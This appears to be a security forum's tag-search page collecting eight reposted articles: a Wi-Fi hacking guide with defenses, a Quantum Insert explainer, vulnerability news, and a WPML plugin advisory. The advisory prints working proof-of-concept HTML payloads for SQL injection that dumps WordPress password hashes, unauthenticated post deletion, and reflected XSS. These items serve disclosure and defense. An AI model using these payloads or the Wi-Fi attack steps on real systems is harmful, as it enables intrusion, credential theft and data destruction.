Jump to content

Search the Community

Showing results for tags 'attacker'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 8 results

  1. While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11\ The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. User has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors. References [1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki [2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm [3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica Source
  2. A Quantum Insert Attack is a classic example of man-in-the-middle attacks which resurfaced into news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread a malware which can work in tandem with a botnet C&C server. Understanding the attack The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained by Internet Service Providers and in the case of cyber espionage crimes, having access within a network looking to move laterally inside. This kind of attack is generally not used for large scale attacks, instead the attacker is very well aware of his target and most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better: Step 1: Step 2: Step 3: In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim. The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded. Simulating the attack To simulate the Quantum Insert attack, we would require three VMs: One VM will act as a victim Second VM will be used to monitor the traffic Third will be used to shoot a malicious payload to the victim. The proof-of-concept code for simulation is available to be downloaded here: Download hough the details of use for the script is given in the github page, let me re-iterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows: Victim visits mysite.com We need SYN+ACK of mysite.com On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. Shooter has a dependency on Scapy to craft packets (with its header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition. How real time QI works I. Foot printing Agencies like NSA and GCHQ catch hold of choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed as TURMOIL captures the network dumps and passes it to traffic analysis tools like Xkeyscore which automate the packet analysis. II. Build User Profiles Tools like Xkeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attacks. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years. III. Attack the target Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites. IV. Maintain access and persist Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to gain his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts. Detecting QI attacks QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But, both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values than the real packets because of the closer proximity of the attacker to the victim. Links for QI detection for snort: GitHub Links for QI PCAPS: GitHub References http://blog.fox-it.com Source
  3. Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week. The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.Cisco IP phones According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone. “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory. Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users. The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems. Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor. Sursa
  4. OVERVIEW ========== WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version 3.1.9.1 released earlier this week to resolve the issues. DETAILS ======== 1. SQL injection When WPML processed a HTTP POST request containing the parameter ”action=wp-link-ajax”, the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend. The following HTML snippet demonstrates the vulnerability: <script> var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users"; if (document.location.search.length < 2) document.location.search="lang=xx' UNION "+union+" -- -- "; </script> <form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed"> <input type=hidden name=action value="wp-link-ajax"> <input type=submit> </form> The results of the SQL query will be shown in the comments feed XML-formatted. 2. Page/post/menu deletion WPML contains a ”menu sync” function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus. Example: <form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"> <input type=hidden name="action" value="icl_msync_confirm"> <input type=text name="sync" size=50 value="del[x][y][12345]=z"> <input type=submit> </form> Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items be deleted with the same request. 3. Reflected XSS The ”reminder popup” code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like: https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors. CREDITS ======== The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10. Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ An up-to-date version of this document can be found on our website http://klikki.fi . -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi Source
  5. More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than1 million WordPress websites imperiled by critical plugin bug. Source
  6. WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites. The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response. “On June 25, 2014 I opened a ticked on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.” The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted. Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it. “There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years. Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email. But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers. “WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,”Arciszewski said. WordPress officials did not respond to questions for this story before publication. Source
  7. Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact Type: Complete confidentiality, integrity and availability violation. [2] Vulnerability: (1) Filtration Bypass. (3) Unauthenticated Cross Site scripting vulnerabilities. Description A malicious user could get unsuspecting visitors into divulging their credentials, to force a redirection to a heterogeneous third-party website, or to execute malicious code, on behalf of the attacker. An attacker can also fold malicious content into the content being delivered to visitors on the site. In this attack “Visitor -> Vendor” trust-levels are directly impacted, since the vendor’s website, and associated services , and products have high levels of trust by default. Read more: http://dl.packetstormsecurity.net/1501-advisories/Oracle_Website_Vulnerabilities119.pdf
  8. Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu. Thunderbird is Mozilla’s email client, and the company recently fixed several memory corruption vulnerabilities, along with a cross-site request forgery bug and a flaw that could lead to a session-fixation attack. “If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird,” the Ubuntu advisory says, referring to the memory corruption vulnerabilities. The CSRF weakness in Thunderbird could be exploited if an attacker can get a user to open a malicious message while scripting is enabled. The session-fixation attack could occur under some circumstances if a user is connected to a malicious web proxy. In addition to the Thunderbird vulnerabilities, there are also patches for several other flaws in Ubuntu. One of the patches fixes a bug in libssh that could cause a denial of service. “It was discovered that libssh incorrectly handled certain kexinit packets. A remote attacker could possibly use this issue to cause libssh to crash, resulting in a denial of service,” the advisory says. There are also two vulnerabilities in the RPM package that could let a local attacker execute arbitrary code and a bug in libevent that could allow code execution in some cases. “Andrew Bartlett discovered that libevent incorrectly handled large inputs to the evbuffer API. A remote attacker could possibly use this issue with an application that uses libevent to cause a denial of service, or possibly execute arbitrary code,” the Ubuntu advisory says. Source
×
×
  • Create New...